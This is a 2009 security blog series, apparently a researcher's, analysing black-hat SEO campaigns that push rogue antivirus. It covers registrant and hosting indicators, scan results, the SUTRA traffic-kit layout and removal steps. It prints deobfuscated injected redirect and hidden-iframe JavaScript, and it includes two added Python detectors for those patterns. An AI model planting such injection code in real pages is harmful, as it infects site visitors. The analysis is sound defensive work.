Sunday, March 29, 2009

Black Hat SEO and Rogue Antivirus p.3

The silent threat: Black Hat SEO and Rogue Antivirus

AntivirusPlus ZlKon Malware drop -

READ THIS page if you need more information

In addition to the fake scanner domains, recent research also reveals that several sites are
registered through "EVOPLUS LTD" with the following information:

Live Internet Marketing Limited ****
attn: Private Registrations
5285 Decarie Boulevard #100
Montreal, QC H3W3C2

Registrar: EVOPLUS LTD
Whois Server:
Referral URL:
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 27-mar-2009
Creation Date: 20-feb-2009
Expiration Date: 20-feb-2010

Registered Through: (


Searching Google shows absolutely no web presence apart from malware and pornography websites:

For "liveinternetmarketingltd": Malware domain drop and pornography websites
For "Live Internet Marketing Limited": Pornography websites
For "": Pornography websites and malware domain found by Malware Domain List.

Looking on malwaredomainlist shows 23 sites with the registrant information "".

Some domains have been added to the list below:



Symantec Result
Registration Service Provided By: HIGH QUALITY HOST COMPANY
Symantec Result
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM

Registration Service Provided By: ERDOMAIN.COM
Registrant: uebochek - Luhansk Oblast,01001 - UA -


ACTIVE domain

PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
*** has a fake error page which redirects to a site that is also hosted on the same IP at ZlKon and also registered by "Live Internet Marketing Limited"; the fraudulent payment page is on the domain below: -

Registration Service Provided By: RESELLERCLUB

Globo inc
John Sparck (
South reg, 14 st, 3
Tel. +27.221994

"Globo inc" includes: , (Already suspended)

Looking on spamhaus also reveals [] []

Hosted on [] AS12553


Some screenshots


File info: installer_1.exe
File size: 666112 bytes
First received: 03.27.2009 17:40:50 (CET)
Results: 17/38 (44.74%)
CAT-QuickHeal: (Suspicious) - DNAScan
McAfee: Generic Downloader.x
Panda: Suspicious File
Symantec: Trojan Horse

We can see on this post that the file downloaded two or three days later has been updated with new code.

Result when running:
HTTP Request: []


File info: AntivirusPlus.exe
File size: 1435136 bytes
VirusTotal: First Report
VirusTotal: Second Report
First received: 03.27.2009 14:17:34 (CET)
Results: 7/39 (17.95%)
Second time: 03.30.2009 05:23:52 (CET)
Results: 12/39 (30.77%)
New info: Prevx

File info: InternetExplorer.dll
File size: 442368 bytes
VirusTotal: First Report
VirusTotal: Second Report
First received: 03.24.2009 16:12:30 (CET)
Results: 20/39 (51.29%)
Second time: 03.30.2009 05:23:52 (CET)
Results: 20/39 (51.29%)


Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Having your website hacked with IFRAME injected, trojans/backdoors?

Having your pages infected with redirection to rogue antivirus/antispyware?

Having your pages replaced with a World Wide Web Consortium article and some
obfuscated JavaScript code appended to them?

This page will show you some recent research about a malware campaign which has infected thousands of websites. In this campaign all of these sites have been used to distribute a fake antispyware called WinWebSec or FakeSpyGuard (sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro).

Since July/August 2008, hundreds of thousands of pages on legitimate domains have been exploited: web pages stuffed with keywords (porn, celebrities, popular snacks) were uploaded to them as a means of attracting victims via search engine results. In some cases the homepage of the compromised site is modified, appending hidden links to the malicious web page.

All information indicates that the attack was carried out via stolen FTP passwords on all these domains.

An alarming observation is that the activity grows at an exponential rate, with increasingly sophisticated malware/exploit code.

You can find some of the IPs, networks and domains used, examples of hacked pages/websites and other malicious code injected into these domains in the links below or on other pages of this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2


The screenshot below shows many websites also used in this rogue AV malware campaign, but with W3C (World Wide Web Consortium) pages uploaded to them with JavaScript code injected.

Source of one of these sites.

In a browser.

Deobfuscation results:

window.location = encodeURI(
"" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");


The source code also reveals thousands of hacked websites. Analysis of the JavaScript code shows that it redirects to one of the domains used in this attack.
You can find more information on this page.

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign

Earlier in March, Adobe released security updates addressing vulnerabilities and
exploits targeting Adobe Reader. Some links can be found below:

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with screenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application, also known as a "Traffic Management System", is explained by
McAfee Avert Labs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and to redirect visitors to exploit code or other malicious URLs serving
fake codecs, rogue antispyware applications, keyloggers, banking trojans and more.

We have another example of a compromised website explained here.
A screenshot of SUTRA can be found.


Now let's take a look at another website used.

The site is ""
[Do not enter this site unless you know what you are doing]

The payload is located here "" [Unstable - file not found at this time]

Just for your information, this is the structure of files/folders for the SUTRA Traffic Manager:

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755)
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
-rw-r--r-- (644)
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
-rw-r--r-- (644) image files and javascript (gif, js)
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
-rw-r--r-- (644) index.html
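As an added example (not from the original post or from SUTRA itself), the Python script below audits a web root for the layout shown above: the CGI and panel file names from the listing, the world-writable (777) directories, and the memory/N.access.log visitor logs. The marker names come from the listing; treating them as indicators, the two-marker threshold and the constructed sample tree are my own assumptions.

```python
"""Audit a web root for the SUTRA traffic-manager layout shown in the listing above."""
import os
import stat
import tempfile

# File names from the listing that identify a SUTRA install (names from the page;
# treating them as indicators is my assumption).
SUTRA_MARKERS = {"in.cgi", "getos.cgi", "gotourl.cgi", "center.cgi", "default.cgi",
                 "ub_fetcher", "crontab_wizard.html", "admin_forces.html", "GeoIP.dat"}


def audit_webroot(root: str) -> dict:
    """Walk `root`; collect SUTRA markers, world-writable dirs and memory/*.access.log."""
    report = {"markers": [], "world_writable": [], "access_logs": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            # drwxrwxrwx (777) directories let any local account drop files there.
            if os.stat(full).st_mode & stat.S_IWOTH:
                report["world_writable"].append(os.path.relpath(full, root))
        for f in filenames:
            rel = os.path.relpath(os.path.join(dirpath, f), root)
            if f in SUTRA_MARKERS:
                report["markers"].append(rel)
            # SUTRA keeps per-feed visitor logs as memory/<n>.access.log.
            if os.path.basename(dirpath) == "memory" and f.endswith(".access.log"):
                report["access_logs"].append(rel)
    for key in ("markers", "world_writable", "access_logs"):
        report[key].sort()
    # Assumed escalation rule: two marker scripts, or any visitor log, is enough.
    report["suspicious"] = len(report["markers"]) >= 2 or bool(report["access_logs"])
    return report


def build_sample_tree(base: str) -> None:
    """Create a constructed tree mimicking part of the listing (demo input only)."""
    layout = {"admin/index.html": 0o644, "in.cgi": 0o755, "getos.cgi": 0o755,
              "memory/2.access.log": 0o644, "html/index.html": 0o644}
    for rel, mode in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    os.chmod(os.path.join(base, "memory"), 0o777)  # 777 as in the listing


def demo() -> dict:
    """Build the sample tree in a temp dir and audit it."""
    base = tempfile.mkdtemp(prefix="sutra_audit_")
    build_sample_tree(base)
    return audit_webroot(base)


if __name__ == "__main__":
    print(demo())
```

Run it against a real document root as `audit_webroot("/var/www/html")`; the demo only exercises the constructed tree.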

The admin page has no password on this server, so anyone can enter and see stats like:

So now we know the IP, domain name and URLs used after redirection,
but where is the traffic coming from?

Let's take a look at another folder, "/memory/"

This folder has files like 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log etc...

Some related topics on this blog refer to , for another malware campaign. Similar files can be found using Google: here and here

2.access.log - The file contains the IPs of visitors reaching infected
websites; some are in the Czech Republic, Israel, Russia, Turkey etc.
The file also reveals the URLs of some compromised websites
where the malicious obfuscated JavaScript code has been inserted.

Line 1:

Javascript Analysis

Line 23: 77.250.xx.xx

Javascript Analysis

Javascript Analysis

The analysis confirms that all these sites have the same code added:

if (!myia){ document.write(unescape('
var myia = true; </script>
<iframe name=c15 src=''+
width=52 height=414 style='display: none'></iframe>

Analysis report for hxxp://

The script loads a PDF located here: [BLOCKED]e30/pdf.php?id=5352,
which then loads this executable --> VirusTotal Report
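As an added example that is not part of the original post, the Python scanner below looks for the two injection patterns shown on this page: the window.location redirect built from document.referrer (deobfuscated in the W3C section above) and the document.write(unescape(...)) payload that writes a hidden iframe. The regexes are my approximation of those patterns, and the sample pages with .invalid hostnames are constructed for the demo.

```python
"""Detect the injected referrer redirect and hidden-iframe patterns in HTML pages."""
import re
import sys

# JavaScript unescape() accepts %XX and %uXXXX; urllib.parse.unquote does not
# handle %uXXXX, so both forms are decoded here.
_UNESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

# document.write(unescape('...')) with the encoded payload as the quoted string.
DOC_WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1", re.S)
# An <iframe ...> whose inline style hides it (display: none), as in the decoded code.
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*style=['\"][^'\"]*display\s*:\s*none[^'\"]*['\"][^>]*>", re.I)
# window.location = encodeURI(... document.referrer ...) as in the deobfuscated script.
REFERRER_REDIRECT = re.compile(
    r"window\.location\s*=\s*encodeURI\([^;]*document\.referrer", re.S)
SRC_ATTR = re.compile(r"src=['\"]([^'\"]*)['\"]", re.I)


def js_unescape(s: str) -> str:
    """Decode a string the way JavaScript's unescape() would."""
    return _UNESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def scan_html(html: str) -> dict:
    """Return the targets of hidden iframes and whether a referrer redirect is present."""
    # Decode document.write(unescape(...)) payloads so that an iframe hidden inside
    # the encoded string is inspected as if the browser had already written it.
    decoded = [js_unescape(m.group(2)) for m in DOC_WRITE_UNESCAPE.finditer(html)]
    text = html + "\n" + "\n".join(decoded)
    iframes = []
    for m in HIDDEN_IFRAME.finditer(text):
        src = SRC_ATTR.search(m.group(0))
        iframes.append(src.group(1) if src else "")
    return {"hidden_iframes": iframes,
            "referrer_redirect": bool(REFERRER_REDIRECT.search(text))}


# Constructed sample mimicking an injected W3C page: an encoded hidden iframe plus
# the referrer/keyword redirect. Hostnames are placeholders, not real infrastructure.
SAMPLE_INJECTED = (
    "<html><body><p>W3C article text</p>\n"
    "<script>if (!myia){ document.write(unescape('"
    "%3Ciframe%20name%3Dc15%20src%3D%27http%3A//redirector.example.invalid/in.cgi%3F3%27"
    "%20width%3D52%20height%3D414%20style%3D%27display%3A%20none%27%3E%3C/iframe%3E"
    "')); var myia = true; }</script>\n"
    "<script>window.location = encodeURI(\"http://seo.example.invalid/go.php?r=\" +\n"
    "  encodeURIComponent(document.referrer) + \"&parameter=$keyword&se=$se&ur=1\");"
    "</script></body></html>"
)
# Constructed clean page: a visible iframe with no redirect should not be flagged.
SAMPLE_CLEAN = ("<html><body><iframe src='http://video.example.invalid/' "
                "width=400 height=300></iframe></body></html>")


if __name__ == "__main__":
    # Scan any files given on the command line, then the built-in samples.
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            print(path, scan_html(fh.read()))
    print("injected:", scan_html(SAMPLE_INJECTED))
    print("clean:", scan_html(SAMPLE_CLEAN))
```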


Some other related links:

Honeynet Malware Detail
Analysis of hxxp:// here

MySpace Profile Attacked (screenshot below)

loyaldown-loyaltube (Fake Codec and RogueAV, Fake Codec and Rogue Antivirus) are sites that distribute fake codecs.
On this network we also have sites which host rogue applications like
XP-Police-Antivirus and Win-PC-Defender.

Fake codec and fake scanner page screenshots [] []




Redirectors used: hxxp://
Analysis here

Site URLs: hxxp://
File info: codec.exe
File size: 107011 bytes
Anubis: Report (related: WinPC Defender)
First received: 03.29.2009 01:17:30 (CET)
Results: 6/39 (15.39%)
Alias: CAT-QuickHeal: (Suspicious) - DNAScan
eSafe: Suspicious File

Site URLs: hxxp://
File info: codec.exe
File size: 107008 bytes
Anubis: Report (related: WinPC Defender)
First received: 03.29.2009 01:41:38 (CET)
Results: 6/39 (15.39%)
Alias: CAT-QuickHeal: (Suspicious) - DNAScan
eSafe: Suspicious File

Associated websites:


av-best-info (Anti-VirusN1 Rogue FakeXPA, "VirusDoctor Online Scan", Anti-Virus1 Rogue FakeXPA) is a site that distributes AntivirusN1, a rogue antivirus application.
AntiVirusN1 displays fake alerts in order to persuade users to buy it.

Registry keys/values must be deleted with an antivirus / antispyware tool.
Anti-Virus Number-1 can be removed by stopping the following processes:

- Kill processes: N1Two.exe, N1i.exe, 2.exe, 3.exe
- Unregister DLLs (regsvr32 /u [dll_name]): QWProtect.dll

- Delete files and folders:

  - C:\Documents and Settings\All Users\Application Data\N1
  - %CommonAppData%\N1
  - %CommonPrograms%\Anti-Virus Number-1

This site appears to be normal at first sight.

Antivirus 1 Site Screenshot

Antivirus 1 Payment system

Payment for this fraudulent rogue program is processed via Plimus (screenshot below).

Antivirus 1 Payment system by Plimus

But the site has been reported as malicious by some users. Here is the fake scanner.

Site screenshot:

Fake Security Warning Message:

Adware.Win32.Look2me.ab Virus Critical Virus High
Trojan-Downloader.Win32.Small.dge Virus High
Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium
W32.Benjamin.Worm Virus High
W32.Mypics.Worm.36352 Virus Medium
W32.Yaha.B@mm Virus Critical
Trojan Horse Generic11.OQJ Virus High
Magic DVD Ripper Virus High
Recommend: Click "Start Protection" button to erase all threats

Fake Security Warning Message

Fake Security Warning Message: Threat detected

Fake scanner page

Fake messages:

Fake Security Warning Message

Alert! Your PC is at risk of virus and spyware attack.

Your system requires immediate check!
System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.

Associated website [] []


Site URLs: hxxp://
File info: AntiVirusInstaller.exe
File size: 53278 bytes
First received: 03.28.2009 19:18:31 (CET)
Results: 8/39 (20.52%)
DrWeb: Trojan.DownLoad.33135
eSafe: Suspicious File
Panda: Suspicious File

When running:

HTTP Requests: []
Content html:
Content html:

File info: 2.exe
File size: 53248 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:07 (CET)
8/39 (20.52%)

File info: 3.exe
File size: 257536 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:18 (CET)
6/39 (15.39%)

File info: AntiVirusInstaller.exe
File size: 53278 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:19 (CET)
8/38 (21.06%)

File info: N1.CAB
File size: 504489 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs
Received on 03.28.2009 22:08:51 (CET)
5/38 (13.16%)

File info: N1.exe
File size: 527360 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs
Received on 03.28.2009 22:09:09 (CET)
5/38 (13.16%)

File info: QWProtect.dll
File size: 697856 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:09:01 (CET)
4/38 (10.53%)

File info: svchost.exe
File size: 80896 Bytes
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:47 (CET)
10/38 (26.32%)

Result when running:
Displays a fake blue screen "MALWARE.MONSTER.DX_NEW_0xA21518F0"

Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0

Rogue Anti-Virus Number-1

Anti-Virus Number-1 Rogue Application Screenshot:

Friday, March 27, 2009

Black Hat SEO and Rogue Antivirus

The silent threat: Black Hat SEO and Rogue Antivirus

Messages telling you to install and update security software for your computer are meant to frighten you.
This tactic is known as scareware:

Related article about "Free Security Scan" alerts from the Federal Trade Commission
Court Halts Bogus Computer Scans
"Free Security Scan" Could Cost Time and Money

For several months now, massive attacks (obfuscated JavaScript inserted, IFRAMEs injecting backdoors/keyloggers) and thousands of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies.

The exponential growth of rogue antivirus distribution through legitimate websites remains silent, as the tactics used by the creators continue to become more sophisticated.

Related article: Scammers making '$15m a month' on fake antivirus
PandaLabs: 22,000 New Malware Samples Detected Every Day in 2008
PandaLabs Annual Report

Rogue AV Detections in 2008

Sites on this blog refer to rogue antispyware which displays misleading scan alerts and is mostly installed on the victim's computer without user consent through infected websites (LEGITIMATE infected websites).


The site now includes IPs, botnet C&C, exposed data logs, links to LIVE URLs of exploits/vulnerabilities (Flash, PDF) and domains with their relations, routes, AS numbers and malicious scripts found on
compromised websites related to the same campaign.

If you arrived at this page through a search engine while looking for a domain listed on this blog, some removal information can be found in the links below. Site analyses will be created and updated as new sites are found, twice or more a day if needed.

If you arrived at this page and you are interested in finding information about these attacks,
and the IPs, domains and networks used, here are some links with details about this malware campaign:

Related article:

Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009
Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360
Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop
Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009
Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants

Black Hat SEO and Rogue Antivirus:

Part. 1) Black Hat SEO and Rogue Antivirus
Part. 2) Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery
Part. 3) Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and
Part. 4) Black Hat SEO and Rogue Antivirus: Full of Rogues
Part. 5) Black Hat SEO and Rogue Antivirus: Full of Hacks
Part. 6) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1
Part. 7) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2
Part. 8) Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger

Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc.

Part. 1) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked
Part. 2) Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimeware toolkits in the wild

And here we have a list of fake scanner websites used in the attack which infected thousands of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): Black Hat SEO and Rogue Antivirus


Other rogue AV such as AntivirusPlus have been detected recently through this list

Many more, under names such as FakeSpyGuard, VirusRemover, WinAntiVirus2008, SpywareRemover2009, and some variants of "Trojan Hiloti", through this list

Similar attacks with Google search strings:

In 2008: We have an example with "Antivirus 2009" on the Trend Micro Malware Blog:
A Million Search Strings to Get Infected

A few days ago: On the CA website "" is cited. The article is here:
Rogue Security Software keeps on hitting Google searches

Another list of fake codec websites in March on Dancho Danchev's blog, also cited on this blog:
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software

Recent searches also reveal the use of the powerful JavaScript library jQuery; the screenshot below has been retrieved from a legitimate infected website.

Deobfuscated result is:

The ip is (ZlKon)

Networks used for hosting these malicious websites are:

Starline Web Services in Estonia
Zlkon in Latvia
netdirekt e.K. in Germany
Hetzner Online AG in Germany
Ural-NET in Russia
Eurohost LLC in Ukraine
GloboTech via Olexij Khrenov in Ukraine
Joint Multimedia Cable Network in Ukraine
NTColo Networks in Ukraine
Plitochnik Lux LTD in Ukraine
Coloquest in US
Netelligent Hosting Services Inc in US
and some others in China and Moldavia.
IPs, AS and network used can be found on this blog.

New sites used

on March 28:,,,,
on March 29:,,

on March 30: [redirection by] and [redirection by],

Analysis here


Related article: The rash of rogue av (PDF)

Related article about McColo Business:
Similar network at UltraNet Ltd in Latvia
HostExploit’s Cyber Crime Series (PDF)

The list on your right-hand side shows the latest websites used in this malware campaign (updated daily).

Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia.
Pages related to the same attack (including some other problems: SPAM, botnets etc.)

December 15, 2008:
FakeAV and Codecs

December 19, 2008:
SPAM IP Detected

McAfee Avert Labs Blog
Monday January 5, 2009
Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business
We also have a complete example here, from the visitor to the legitimate infected website (with logs, screenshots, IPs and analysis of the malicious website as well as the techniques used, i.e. SUTRA traffic redirection, PDF exploit to inject backdoors etc.).

Zeus Tracker

Wednesday January 7, 2009
Google Code Project Abused by Spammers

January 19, 2009
Inaccurate whois details

January 2009
Paragraph: Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called ""

Paragraph from the

Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customers, of course under domains, have been generating quite some malicious activity at for a while.

January 25, 2009
Rogue software - FakeAV

February 5, 2009
Similar attack with the same code added between markers like <!-- ad --> <!-- /ad -->
(Same code here)


Wednesday February 25, 2009
Google Trends Abused to Serve Malware